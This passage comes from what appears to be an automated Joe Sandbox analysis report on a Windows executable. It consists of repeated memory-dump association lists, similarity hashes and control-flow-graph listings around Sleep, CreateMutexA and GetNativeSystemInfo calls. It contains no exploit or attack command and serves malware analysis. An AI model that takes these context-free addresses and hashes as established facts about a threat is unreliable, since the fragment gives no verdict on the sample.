                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2
                                                                                                                                                                                                                                                  • API String ID: 1464230837-631260391
                                                                                                                                                                                                                                                  • Opcode ID: afaabf874fc6ac41699669b296860f0efa8ff01268d29f25801a9a7034aa3787
                                                                                                                                                                                                                                                  • Instruction ID: 7a9fb1d40b3b941f328824c217c279d28d8b5454068488d1cc3a34bfcb99700b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afaabf874fc6ac41699669b296860f0efa8ff01268d29f25801a9a7034aa3787
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 052145317042009BEB18AB68FCC9B6CB762EBC1310F24972DE40CA72E1D7759984CB16

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 398 e7a856-e7a86e 399 e7a870-e7a87c 398->399 400 e7a89c-e7a89e 398->400 401 e7a892-e7a899 call e8d663 399->401 402 e7a87e-e7a88c 399->402 403 e7a8a0-e7a8a7 400->403 404 e7a8a9-e7a8b1 call e77d30 400->404 401->400 402->401 405 e7a94e 402->405 407 e7a8eb-e7a916 call e880c0 403->407 415 e7a8e4-e7a8e6 404->415 416 e7a8b3-e7a8bb call e77d30 404->416 409 e7a953-e7a987 Sleep CreateMutexA 405->409 410 e7a94e call ea6c6a 405->410 417 e7a98e-e7a994 409->417 410->409 415->407 416->415 422 e7a8bd-e7a8c5 call e77d30 416->422 420 e7a9a7-e7a9a8 417->420 421 e7a996-e7a998 417->421 421->420 423 e7a99a-e7a9a5 421->423 422->415 427 e7a8c7-e7a8cf call e77d30 422->427 423->420 427->415 430 e7a8d1-e7a8d9 call e77d30 427->430 430->415 433 e7a8db-e7a8e2 430->433 433->407
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00E7A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2
                                                                                                                                                                                                                                                  • API String ID: 1464230837-631260391
                                                                                                                                                                                                                                                  • Opcode ID: 0e83b0ca0d8b18081196056d1a8cf7fa88b9d0025453c9120156ce8f9de7e1db
                                                                                                                                                                                                                                                  • Instruction ID: 79b1f9db831a745773f761b9f38ca9dadafaf8aa8c44f2224c557812311af7f2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e83b0ca0d8b18081196056d1a8cf7fa88b9d0025453c9120156ce8f9de7e1db
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90214D70349201CAFB28A778ED8E73DB351DFC1304F2CA93AE54CB62D1CA7644818253

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 375 e7a34f-e7a35b 376 e7a371-e7a39a call e8d663 375->376 377 e7a35d-e7a36b 375->377 383 e7a39c-e7a3a8 376->383 384 e7a3c8-e7a916 call e880c0 376->384 377->376 378 e7a93a 377->378 380 e7a953-e7a994 Sleep CreateMutexA 378->380 381 e7a93a call ea6c6a 378->381 389 e7a9a7-e7a9a8 380->389 390 e7a996-e7a998 380->390 381->380 386 e7a3be-e7a3c5 call e8d663 383->386 387 e7a3aa-e7a3b8 383->387 386->384 387->378 387->386 390->389 393 e7a99a-e7a9a5 390->393 393->389
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00E7A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2
                                                                                                                                                                                                                                                  • API String ID: 1464230837-631260391
                                                                                                                                                                                                                                                  • Opcode ID: 6e36d2af941bd54d908fc1123bf85a6a447b020a469b0764bf1fe2fe306caf40
                                                                                                                                                                                                                                                  • Instruction ID: 8d3921834c3d452976191b04d238e5fc8a184d94f8a45f8f80cf3fdad23d5823
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e36d2af941bd54d908fc1123bf85a6a447b020a469b0764bf1fe2fe306caf40
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF214271704200ABEB18AF28EC8976CB762EBC1321F28962DE40CB76D0D77699848752

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 527 e77d30-e77db2 call ea40f0 531 e78356-e78373 call e8cff1 527->531 532 e77db8-e77de0 call e87a00 call e75c10 527->532 539 e77de4-e77e06 call e87a00 call e75c10 532->539 540 e77de2 532->540 545 e77e0a-e77e23 539->545 546 e77e08 539->546 540->539 549 e77e25-e77e34 545->549 550 e77e54-e77e7f 545->550 546->545 551 e77e36-e77e44 549->551 552 e77e4a-e77e51 call e8d663 549->552 553 e77e81-e77e90 550->553 554 e77eb0-e77ed1 550->554 551->552 557 e78374 call ea6c6a 551->557 552->550 559 e77ea6-e77ead call e8d663 553->559 560 e77e92-e77ea0 553->560 555 e77ed7-e77edc 554->555 556 e77ed3-e77ed5 GetNativeSystemInfo 554->556 561 e77edd-e77ee6 555->561 556->561 568 e78379-e7837f call ea6c6a 557->568 559->554 560->557 560->559 566 e77f04-e77f07 561->566 567 e77ee8-e77eef 561->567 572 e782f7-e782fa 566->572 573 e77f0d-e77f16 566->573 570 e77ef5-e77eff 567->570 571 e78351 567->571 575 e7834c 570->575 571->531 572->571 578 e782fc-e78305 572->578 576 e77f29-e77f2c 573->576 577 e77f18-e77f24 573->577 575->571 580 e782d4-e782d6 576->580 581 e77f32-e77f39 576->581 577->575 582 e78307-e7830b 578->582 583 e7832c-e7832f 578->583 586 e782e4-e782e7 580->586 587 e782d8-e782e2 580->587 588 e77f3f-e77f9b call e87a00 call e75c10 call e87a00 call e75c10 call e75d50 581->588 589 e78019-e782bd call e87a00 call e75c10 call e87a00 call e75c10 call e75d50 call e87a00 call e75c10 call e75730 call e87a00 call e75c10 call e87a00 call e75c10 call e75d50 call e87a00 call e75c10 call e75730 call e87a00 call e75c10 call e87a00 call e75c10 call e75d50 call e87a00 call e75c10 call e75730 call e87a00 call e75c10 call e87a00 call e75c10 call e75d50 call e87a00 call e75c10 call e75730 581->589 590 e78320-e7832a 582->590 591 e7830d-e78312 582->591 584 e78331-e7833b 583->584 585 e7833d-e78349 583->585 584->571 585->575 586->571 593 e782e9-e782f5 586->593 587->575 612 e77fa0-e77fa7 588->612 625 e782c3-e782cc 589->625 590->571 591->590 595 e78314-e7831e 591->595 593->575 595->571 614 e77fab-e77fcb call ea8bbe 612->614 615 e77fa9 612->615 622 e78002-e78004 614->622 623 e77fcd-e77fdc 614->623 615->614 622->625 626 e7800a-e78014 622->626 627 e77ff2-e77fff call e8d663 623->627 628 e77fde-e77fec 623->628 625->572 630 e782ce 625->630 626->625 627->622 628->568 628->627 630->580
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E77ED3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
